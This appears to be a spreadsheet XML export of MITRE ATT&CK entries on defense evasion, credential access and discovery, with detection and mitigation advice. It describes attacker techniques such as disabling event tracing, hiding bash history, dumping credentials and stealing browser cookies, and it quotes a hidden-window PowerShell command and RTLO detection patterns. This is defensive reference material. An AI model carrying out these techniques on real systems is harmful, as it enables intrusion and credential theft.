There are a variety of features in scripting languages in Windows, such as [PowerShell](https://attack.mitre.org/techniques/T1086), Jscript, and VBScript to make windows hidden. One example of this is &lt;code&gt;powershell.exe -WindowStyle Hidden&lt;/code&gt;.  (Citation: PowerShell About 2019)
### Mac
The configurations for how applications run on macOS are listed in property list (plist) files. One of the tags in these files can beÂ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window.(Citation: Antiquated Mac Malware)
</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</si>
  <si>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</si>
  <si>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Whitelist programs that are allowed to have this plist tag. All other programs should be considered suspicious.</t>
  </si>
  <si>
    <t>Windows event logs, PowerShell logs, Process command-line parameters, Process monitoring</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1143</t>
  </si>
  <si>
    <t>T1148</t>
  </si>
  <si>
    <t>HISTCONTROL</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</si>
  <si>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</si>
  <si>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Correlating a user session with a distinct lack of new commands in their &lt;code&gt;.bash_history&lt;/code&gt; can be a clue to suspicious behavior. Additionally, users checking or changing their &lt;code&gt;HISTCONTROL&lt;/code&gt; environment variable is also suspicious.</t>
  </si>
  <si>
    <t>Prevent users from changing the &lt;code&gt;HISTCONTROL&lt;/code&gt; environment variable (Citation: Securing bash history). Also, make sure that the &lt;code&gt;HISTCONTROL&lt;/code&gt; environment variable is set to "ignoredup" instead of "ignoreboth" or "ignorespace".</t>
  </si>
  <si>
    <t>Process monitoring, Authentication logs, File monitoring, Environment variable</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1148</t>
  </si>
  <si>
    <t>T1054</t>
  </si>
  <si>
    <t>Indicator Blocking</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</si>
  <si>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[PowerShell](https://attack.mitre.org/techniques/T1086) or [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).
ETW interruption can be achieved multiple ways, however most directly by defining conditions using the PowerShell Set-EtwTraceProvider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</si>
  <si>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 xml:space="preserve">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
</t>
  </si>
  <si>
    <t>Ensure event tracers/forwarders (Citation: Microsoft ETW May 2018), firewall policies, and other associated mechanisms are secured with appropriate permissions and access controls. Consider automatically relaunching forwarding mechanisms at recurring intervals (ex: temporal, on-logon, etc.) as well as applying appropriate change management to firewall rules and other related system configurations.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1054</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Mitigation is difficult in instances like this because the adversary may have access to the system through another channel and can learn what techniques or tools are blocked by resident defenses. Exercising best practices with configuration and security as well as ensuring that proper process is followed during investigation of potential compromise is essential to detecting a larger intrusion through discrete alerts.
Identify and block potentially malicious software that may be used by an adversary by using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</t>
  </si>
  <si>
    <t>Process use of network, Process monitoring, Process command-line parameters, Anti-virus</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1066</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Automatically forward events to a log server or data repository to prevent conditions in which the adversary can locate and manipulate data on the local system. When possible, minimize time delay on event reporting to avoid prolonged storage on the local system. Protect generated event files that are stored locally with proper permissions and authentication and limit opportunities for adversaries to increase privileges by preventing Privilege Escalation opportunities. Obfuscate/encrypt event files locally and in transit to avoid giving feedback to an adversary.</t>
  </si>
  <si>
    <t>File monitoring, Process monitoring, Process command-line parameters, API monitoring</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1070</t>
  </si>
  <si>
    <t>T1202</t>
  </si>
  <si>
    <t>Indirect Command Execution</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Identify or block potentially malicious software that may contain abusive functionality by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP). These mechanisms can also be used to disable and/or limit user access to Windows utilities and file types/locations used to invoke malicious execution.(Citation: SpectorOPs SettingContent-ms Jun 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1202</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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HTTP Public Key Pinning (HPKP) is one method to mitigate potential man-in-the-middle situations where and adversary uses a mis-issued or fraudulent certificate to intercept encrypted communications by enforcing use of an expected certificate. (Citation: Wikipedia HPKP)
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t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1130</t>
  </si>
  <si>
    <t>T1149</t>
  </si>
  <si>
    <t>LC_MAIN Hijacking</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Enforce valid digital signatures for signed code on all applications and only trust applications with signatures from trusted parties.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1149</t>
  </si>
  <si>
    <t>T1036</t>
  </si>
  <si>
    <t>Masquerading</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</si>
  <si>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
For RTLO, detection methods should include looking for common formats of RTLO characters within filenames such as "\u202E", "[U+202E]", and "%E2%80%AE". Defenders should also check their analysis tools to ensure they do not interpret the RTLO character and instead print the true name of the a file containing it.</t>
  </si>
  <si>
    <t>When creating security rules, avoid exclusions based on file name or file path. Require signed binaries. Use file system access controls to protect folders such as C:\Windows\System32. Use tools that restrict program execution via whitelisting by attributes other than file name.
Identify potentially malicious software that may look like a legitimate program based on name and location,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</si>
  <si>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https://attack.mitre.org/techniques/T1036</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Misconfiguration of permissions in the Registry may lead to opportunities for an adversary to execute code, like through [Service Registry Permissions Weakness](https://attack.mitre.org/techniques/T1058). Ensure proper permissions are set for Registry hives to prevent users from modifying keys for system components that may lead to privilege escalation.
Identify and block unnecessary system utilities or potentially malicious software that may be used to modify the Registry by using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1112</t>
  </si>
  <si>
    <t>T1126</t>
  </si>
  <si>
    <t>Network Share Connection Removal</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Follow best practices for mitigation of activity related to establishing [Windows Admin Shares](https://attack.mitre.org/techniques/T1077). 
Identify unnecessary system utilities or potentially malicious software that may be used to leverage network shares, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</t>
  </si>
  <si>
    <t>Process monitoring, Process command-line parameters, Packet capture, Authentication logs</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1126</t>
  </si>
  <si>
    <t>T1096</t>
  </si>
  <si>
    <t>NTFS File Attributes</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</si>
  <si>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</si>
  <si>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</si>
  <si>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It may be difficult or inadvisable to block access to EA and ADSs. (Citation: Microsoft ADS Mar 2014) (Citation: Symantec ADS May 2009) Efforts should be focused on preventing potentially malicious software from running. Identify and block potentially malicious software that may contain functionality to hide information in EA and ADSs by using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)
Consider adjusting read and write permissions for NTFS EA, though this should be tested to ensure routine OS operations are not impeded. (Citation: InsiderThreat NTFS EA Oct 2017)</t>
  </si>
  <si>
    <t>File monitoring, Kernel drivers, API monitoring, Process command-line parameters</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1096</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Ensure logging and detection mechanisms analyze commands after being processed/interpreted, rather than the raw input. Consider utilizing the Antimalware Scan Interface (AMSI) on Windows 10 for this functionality. (Citation: Microsoft AMSI June 2015)
Mitigation of compressed and encrypted files sent over the network and through email may not be advised since it may impact normal operations.</t>
  </si>
  <si>
    <t>Network protocol analysis, Process use of network, File monitoring, Malware reverse engineering</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1027</t>
  </si>
  <si>
    <t>T1186</t>
  </si>
  <si>
    <t>Process Doppelgänging</t>
  </si>
  <si>
    <t>Monitor and analyze calls to CreateTransaction,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</si>
  <si>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This type of attack technique cannot be easily mitigated with preventive controls or patched since it is based on the abuse of operating system design features. For example, mitigating specific API calls will likely have unintended side effects, such as preventing legitimate process-loading mechanisms from operating properly. Efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identifying subsequent malicious behavior.
Although Process Doppelgänging may be used to evade certain types of defenses, it is still good practice to identify potentially malicious software that may be used to perform adversarial actions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</si>
  <si>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https://attack.mitre.org/techniques/T1186</t>
  </si>
  <si>
    <t>T1093</t>
  </si>
  <si>
    <t>Process Hollowing</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</si>
  <si>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</si>
  <si>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</si>
  <si>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process hollowing may be used to evade certain types of defenses, it is still good practice to identify potentially malicious software that may be used to perform adversarial actions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</si>
  <si>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https://attack.mitre.org/techniques/T1093</t>
  </si>
  <si>
    <t>T1536</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</si>
  <si>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</si>
  <si>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easily facilitated using restoration from VM or data storage snapshots through the cloud management dashboard. Another variation of this technique is to utilize temporary storage attached to the compute instance. Most cloud providers provide various types of storage including persistent, local, and/or ephemeral, with the latter types often reset upon stop/restart of the VM.(Citation: Tech Republic - Restore AWS Snapshots)(Citation: Google - Restore Cloud Snapshot)</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</si>
  <si>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</si>
  <si>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Azure OS logs, AWS CloudTrail logs, Azure activity logs, Stackdriver logs</t>
  </si>
  <si>
    <t>AWS, GCP</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1536</t>
  </si>
  <si>
    <t>T1014</t>
  </si>
  <si>
    <t>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Identify potentially malicious software that may contain rootkit functionality,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</si>
  <si>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https://attack.mitre.org/techniques/T1014</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Adversaries may use virtual machine software protection as a form of software packing to protect their code. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.(Citation: ESET FinFisher Jan 2018)</t>
  </si>
  <si>
    <t>Use file scanning to look for known software packers or artifacts of packing techniques. Packing is not a definitive indicator of malicious activity, because legitimate software may use packing techniques to reduce binary size or to protect proprietary code.</t>
  </si>
  <si>
    <t>Ensure updated virus definitions. Create custom signatures for observed malware. Employ heuristic-based malware detection.
Identify and prevent execution of potentially malicious software that may have been packed by using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1045</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</si>
  <si>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</si>
  <si>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</si>
  <si>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(Citation: SANS Brian Wiltse Template Injection)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</si>
  <si>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</si>
  <si>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Consider disabling Microsoft Office macros/active content to prevent the execution of malicious payloads in documents (Citation: Microsoft Disable Macros), though this setting may not mitigate the [Forced Authentication](https://attack.mitre.org/techniques/T1187) use for this technique.
Because this technique involves user interaction on the endpoint, it's difficult to fully mitigate. However, there are potential mitigations including training users to identify social engineering techniques and spearphishing emails. Network/Host intrusion prevention systems, antivirus, and detonation chambers can be employed to prevent documents from fetching and/or executing malicious payloads. (Citation: Anomali Template Injection MAR 2018)</t>
  </si>
  <si>
    <t>Anti-virus, Email gateway, Network intrusion detection system, Web logs</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1221</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Mitigation of timestomping specifically is likely difficult. Efforts should be focused on preventing potentially malicious software from running. Identify and block potentially malicious software that may contain functionality to perform timestomping by using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1099</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</si>
  <si>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</si>
  <si>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</si>
  <si>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For example, AWS GuardDuty is not supported in every region.(Citation: AWS Region Service Table)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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1535</t>
  </si>
  <si>
    <t>T1497</t>
  </si>
  <si>
    <t>Virtualization/Sandbox Evasion</t>
  </si>
  <si>
    <t xml:space="preserve">Virtualization, sandbox,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[Discovery](https://attack.mitre.org/tactics/TA0007), especially in a short period of time, may aid in detection.
</t>
  </si>
  <si>
    <t>Mitigation of this technique with preventative controls may impact the adversary's decision process depending on what they're looking for, how they use the information, and what their objectives are. Since it may be difficult to mitigate all aspects of information that could be gathered, efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identifying subsequent malicious behavior if compromised.</t>
  </si>
  <si>
    <t>defense-evasion, discovery</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1497</t>
  </si>
  <si>
    <t>T1102</t>
  </si>
  <si>
    <t>Web Service</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Firewalls and Web proxies can be used to enforce external network communication policy. It may be difficult for an organization to block particular services because so many of them are commonly used during the course of business.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or encoded commands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</si>
  <si>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Host network interface, Netflow/Enclave netflow, Network protocol analysis, Packet capture</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1102</t>
  </si>
  <si>
    <t>T1506</t>
  </si>
  <si>
    <t>Web Session Cookie</t>
  </si>
  <si>
    <t xml:space="preserve">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the adversary then imports the cookie into a browser they control and is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t>
  </si>
  <si>
    <t>Monitor for anomalous access of websites and cloud-based applications by the same user in different locations or by different systems that do not match expected configurations.</t>
  </si>
  <si>
    <t>Office 365, SaaS</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1506</t>
  </si>
  <si>
    <t>TA0006</t>
  </si>
  <si>
    <t>Credential Access</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/tactics/TA0006</t>
  </si>
  <si>
    <t>T1139</t>
  </si>
  <si>
    <t>Bash History</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</si>
  <si>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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1139</t>
  </si>
  <si>
    <t>T1110</t>
  </si>
  <si>
    <t>Brute Force</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</si>
  <si>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For password spraying consider the following(Citation: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</si>
  <si>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Set account lockout policies after a certain number of failed login attempts to prevent passwords from being guessed. 
Too strict a policy can create a denial of service condition and render environments un-usable, with all accounts being locked-out permanently. Use multifactor authentication. Follow best practices for mitigating access to [Valid Accounts](https://attack.mitre.org/techniques/T1078)
Refer to NIST guidelines when creating passwords.(Citation: NIST 800-63-3)
Where possible, also enable multi factor authentication on external facing services.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1110</t>
  </si>
  <si>
    <t>T1522</t>
  </si>
  <si>
    <t>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</si>
  <si>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</si>
  <si>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 xml:space="preserve">* Monitor access to the Instance Metadata API and look for anomalous queries.
* It may be possible to detect adversary use of credentials they have obtained. See [Valid Accounts](https://attack.mitre.org/techniques/T1078) for more information.
</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1522</t>
  </si>
  <si>
    <t>T1003</t>
  </si>
  <si>
    <t>Credential Dumping</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</si>
  <si>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</si>
  <si>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 Windows
Monitor/harden access to LSASS and SAM table with tools that allow process whitelisting. Limit credential overlap across systems to prevent lateral movement opportunities using [Valid Accounts](https://attack.mitre.org/techniques/T1078) if passwords and hashes are obtained. Ensure that local administrator accounts have complex, unique passwords across all systems on the network.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(Citation: Microsoft Securing Privileged Access)
On Windows 8.1 and Windows Server 2012 R2, enable Protected Process Light for LSA. (Citation: Microsoft LSA)
Identify and block potentially malicious software that may be used to dump credentials by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)
With Windows 10, Microsoft implemented new protections called Credential Guard to protect the LSA secrets that can be used to obtain credentials through forms of credential dumping. It is not configured by default and has hardware and firmware system requirements. (Citation: TechNet Credential Guard) It also does not protect against all forms of credential dumping. (Citation: GitHub SHB Credential Guard)
Manage the access control list for "Replicating Directory Changes" and other permissions associated with domain controller replication. (Citation: AdSecurity DCSync Sept 2015) (Citation: Microsoft Replication ACL)
Consider disabling or restricting NTLM traffic. (Citation: Microsoft Disable NTLM Nov 2012)
### Linux
Scraping the passwords from memory requires root privileges. Follow best practices in restricting access to escalated privileges to avoid hostile programs from accessing such sensitive regions of memory.</t>
  </si>
  <si>
    <t>API monitoring, Process monitoring, PowerShell logs, Process command-line parameters</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1003</t>
  </si>
  <si>
    <t>T1503</t>
  </si>
  <si>
    <t>Credentials from Web Browsers</t>
  </si>
  <si>
    <t>Adversaries may acquire credentials from web browsers by reading files specific to the target browser.  (Citation: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â€ŽApril 2018)
Adversaries have executed similar procedures for common web browsers such as FireFox, Safari, Edge, etc. (Citation: Proofpoint Vega Credential Stealer May 2018)(Citation: FireEye HawkEye Malware July 2017)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</si>
  <si>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</si>
  <si>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Process monitoring, PowerShell logs, File monitoring, API monitoring</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1503</t>
  </si>
  <si>
    <t>T1081</t>
  </si>
  <si>
    <t>Credentials in Files</t>
  </si>
  <si>
    <t xml:space="preserve">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
In cloud environments, authenticated user credentials are often stored in local configuration and credential files. In some cases, these files can be copied and reused on another machine or the contents can be read and then used to authenticate without needing to copy any files. (Citation: Specter Ops - Cloud Credential Storage)
</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</si>
  <si>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</si>
  <si>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Establish an organizational policy that prohibits password storage in files. Ensure that developers and system administrators are aware of the risk associated with having plaintext passwords in software configuration files that may be left on endpoint systems or servers. Preemptively search for files containing passwords and remove when found. Restrict file shares to specific directories with access only to necessary users. Remove vulnerable Group Policy Preferences. (Citation: Microsoft MS14-025)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1081</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Do not store credentials within the Registry. Proactively search for credentials within Registry keys and attempt to remediate the risk. If necessary software must store credentials, then ensure those accounts have limited permissions so they cannot be abused if obtained by an adversary.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1214</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</si>
  <si>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</si>
  <si>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</si>
  <si>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code.Â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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1212</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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whitelisting. (Citation: US-CERT SMB Security) (Citation: US-CERT APT Energy Oct 2017)
For internal traffic, monitor the workstation-to-workstation unusual (vs. baseline) SMB traffic. For many networks there should not be any, but it depends on how systems on the network are configured and where resources are located.
Use strong passwords to increase the difficulty of credential hashes from being cracked if they are obtained.</t>
  </si>
  <si>
    <t>File monitoring, Network protocol analysis, Network device logs, Process use of network</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1187</t>
  </si>
  <si>
    <t>T1056</t>
  </si>
  <si>
    <t>Input Capture</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Identify and block potentially malicious software that may be used to acquire credentials or information from the user by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)
In cases where this behavior is difficult to detect or mitigate, efforts can be made to lessen some of the impact that might result from an adversary acquiring credential information. It is also good practice to follow mitigation recommendations for adversary use of [Valid Accounts](https://attack.mitre.org/techniques/T1078).</t>
  </si>
  <si>
    <t>collection, credential-access</t>
  </si>
  <si>
    <t>Windows Registry, Kernel drivers, Process monitoring, API monitoring</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1056</t>
  </si>
  <si>
    <t>T1141</t>
  </si>
  <si>
    <t>Input Prompt</t>
  </si>
  <si>
    <t>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Control](https://attack.mitre.org/techniques/T1088)).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[AppleScript](https://attack.mitre.org/techniques/T1155)(Citation: LogRhythm Do You Trust Oct 2014)(Citation: OSX Keydnap malware) and [PowerShell](https://attack.mitre.org/techniques/T1086)(Citation: LogRhythm Do You Trust Oct 2014)(Citation: Enigma Phishing for Credentials Jan 2015).</t>
  </si>
  <si>
    <t>Monitor process execution for unusual programs as well as malicious instances of [Scripting](https://attack.mitre.org/techniques/T1064) that could be used to prompt users for credentials.
Inspect and scrutinize input prompts for indicators of illegitimacy, such as non-traditional banners, text, timing, and/or sources.</t>
  </si>
  <si>
    <t>This technique exploits users' tendencies to always supply credentials when prompted, which makes it very difficult to mitigate. Use user training as a way to bring awareness and raise suspicion for potentially malicious events (ex: Office documents prompting for credentials).</t>
  </si>
  <si>
    <t>Process monitoring, Process command-line parameters, User interface, PowerShell logs</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1141</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Ensure strong password length (ideally 25+ characters) and complexity for service accounts and that these passwords periodically expire. (Citation: AdSecurity Cracking Kerberos Dec 2015) Also consider using Group Managed Service Accounts or another third party product such as password vaulting. (Citation: AdSecurity Cracking Kerberos Dec 2015)
Limit service accounts to minimal required privileges, including membership in privileged groups such as Domain Administrators. (Citation: AdSecurity Cracking Kerberos Dec 2015)
Enable AES Kerberos encryption (or another stronger encryption algorithm), rather than RC4, where possible. (Citation: AdSecurity Cracking Kerberos Dec 2015)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1208</t>
  </si>
  <si>
    <t>T1142</t>
  </si>
  <si>
    <t>Keychain</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</si>
  <si>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</si>
  <si>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Unlocking the keychain and using passwords from it is a very common process, so there is likely to be a lot of noise in any detection technique. Monitoring of system calls to the keychain can help determine if there is a suspicious process trying to access it.</t>
  </si>
  <si>
    <t>The password for the user's login keychain can be changed from the user's login password. This increases the complexity for an adversary because they need to know an additional password.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1142</t>
  </si>
  <si>
    <t>T1171</t>
  </si>
  <si>
    <t>LLMNR/NBT-NS Poisoning and Relay</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Windows event logs, Windows Registry, Packet capture, Netflow/Enclave netflow</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1171</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Relay](https://attack.mitre.org/techniques/T1171),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</si>
  <si>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</si>
  <si>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Ensure that all wireless traffic is encrypted appropriately. Use Kerberos, SSL, and multifactor authentication wherever possible. Monitor switches and network for span port usage, ARP/DNS poisoning, and router reconfiguration.
Identify and block potentially malicious software that may be used to sniff or analyze network traffic by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</t>
  </si>
  <si>
    <t>credential-access, discovery</t>
  </si>
  <si>
    <t>Network device logs, Host network interface, Netflow/Enclave netflow, Process monitoring</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1040</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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 (Citation: Microsoft Install Password Filter n.d)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1174</t>
  </si>
  <si>
    <t>T1145</t>
  </si>
  <si>
    <t>Private Keys</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Use strong passphrases for private keys to make cracking difficult. When possible, store keys on separate cryptographic hardware instead of on the local system. Ensure only authorized keys are allowed access to critical resources and audit access lists regularly. Ensure permissions are properly set on folders containing sensitive private keys to prevent unintended access. Use separate infrastructure for managing critical systems to prevent overlap of credentials and permissions on systems that could be used as vectors for lateral movement. Follow other best practices for mitigating access through use of [Valid Accounts](https://attack.mitre.org/techniques/T1078).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1145</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1167</t>
  </si>
  <si>
    <t>T1528</t>
  </si>
  <si>
    <t>Steal Application Access Token</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</si>
  <si>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Link](https://attack.mitre.org/techniques/T1192) to the target user to entice them to grant access to the application. Once the OAuth access token is granted, the application can gain potentially long-term access to features of the user account through [Application Access Token](https://attack.mitre.org/techniques/T1527).(Citation: Microsoft - Azure AD Identity Tokens - Aug 2019)
Adversaries have been seen targeting Gmail, Microsoft Outlook, and Yahoo Mail users.(Citation: Amnesty OAuth Phishing Attacks, August 2019)(Citation: Trend Micro Pawn Storm OAuth 2017)</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1528</t>
  </si>
  <si>
    <t>T1539</t>
  </si>
  <si>
    <t>Steal Web Session Cookie</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</si>
  <si>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Mauraena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Cookie](https://attack.mitre.org/techniques/T1506) technique to login to the corresponding web application.</t>
  </si>
  <si>
    <t>Monitor for attempts to access files and repositories on a local system that are used to store browser session cookies. Monitor for attempts by programs to inject into or dump browser process memory.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1539</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Remove smart cards when not in use. Protect devices and services used to transmit and receive out-of-band codes.
Identify and block potentially malicious software that may be used to intercept 2FA credentials on a system by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1111</t>
  </si>
  <si>
    <t>TA0007</t>
  </si>
  <si>
    <t>Discovery</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/tactics/TA0007</t>
  </si>
  <si>
    <t>T1087</t>
  </si>
  <si>
    <t>Account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</si>
  <si>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</si>
  <si>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 (Citation: UCF STIG Elevation Account Enumeration)
Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about system and domain accounts, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</t>
  </si>
  <si>
    <t>Azure activity logs, Office 365 account logs, API monitoring, Process monitoring</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1087</t>
  </si>
  <si>
    <t>T1010</t>
  </si>
  <si>
    <t>Application Window Discovery</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</si>
  <si>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</si>
  <si>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</si>
  <si>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acquire information,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</si>
  <si>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https://attack.mitre.org/techniques/T1010</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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File system activity is a common part of an operating system, so it is unlikely that mitigation would be appropriate for this technique. For example, mitigating accesses to browser bookmark files will likely have unintended side effects such as preventing legitimate software from operating properly. Efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identification of subsequent malicious behavior. It may still be beneficial to identify and block unnecessary system utilities or potentially malicious software by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</t>
  </si>
  <si>
    <t>API monitoring, File monitoring, Process command-line parameters, Process monitoring</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1217</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Monitor account activity logs to see actions performed and activity associated with the cloud service management console. Some cloud providers, such as AWS, provide distinct log events for login attempts to the management console.(Citation: AWS Console Sign-in Events)</t>
  </si>
  <si>
    <t>Office 365 audit logs, Azure activity logs, Stackdriver logs, AWS CloudTrail logs</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1538</t>
  </si>
  <si>
    <t>T1526</t>
  </si>
  <si>
    <t>Cloud Service Discovery</t>
  </si>
  <si>
    <t>An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ depending on if it's platform-as-a-service (PaaS), infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many different services exist throughout the various cloud providers and can include continuous integration and continuous delivery (CI/CD), Lambda Functions, Azure AD, etc. Adversaries may attempt to discover information about the services enabled throughout the environment.
Pacu, an open source AWS exploitation framework, supports several methods for discovering cloud services.(Citation: GitHub Pacu)</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1526</t>
  </si>
  <si>
    <t>T1482</t>
  </si>
  <si>
    <t>Domain Trust Discovery</t>
  </si>
  <si>
    <t>Adversaries may attempt to gather information on domain trust relationships that may be used to identify [Lateral Movement](https://attack.mitre.org/tactics/TA0008)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Injection](https://attack.mitre.org/techniques/T1178), [Pass the Ticket](https://attack.mitre.org/techniques/T1097), and [Kerberoasting](https://attack.mitre.org/techniques/T1208).(Citation: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</si>
  <si>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&lt;code&gt;nltest /domain_trusts&lt;/code&gt;.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[PowerShell](https://attack.mitre.org/techniques/T1086). The .NET method GetAllTrustRelationships() can be an indicator of [Domain Trust Discovery](https://attack.mitre.org/techniques/T1482).(Citation: Microsoft GetAllTrustRelationships)
</t>
  </si>
  <si>
    <t>Map the trusts within existing domains/forests and keep trust relationships to a minimum. Employ network segmentation for sensitive domains.(Citation: Harmj0y Domain Trusts)</t>
  </si>
  <si>
    <t>PowerShell logs, API monitoring, Process command-line parameters, Process monitoring</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1482</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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proceExesses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</si>
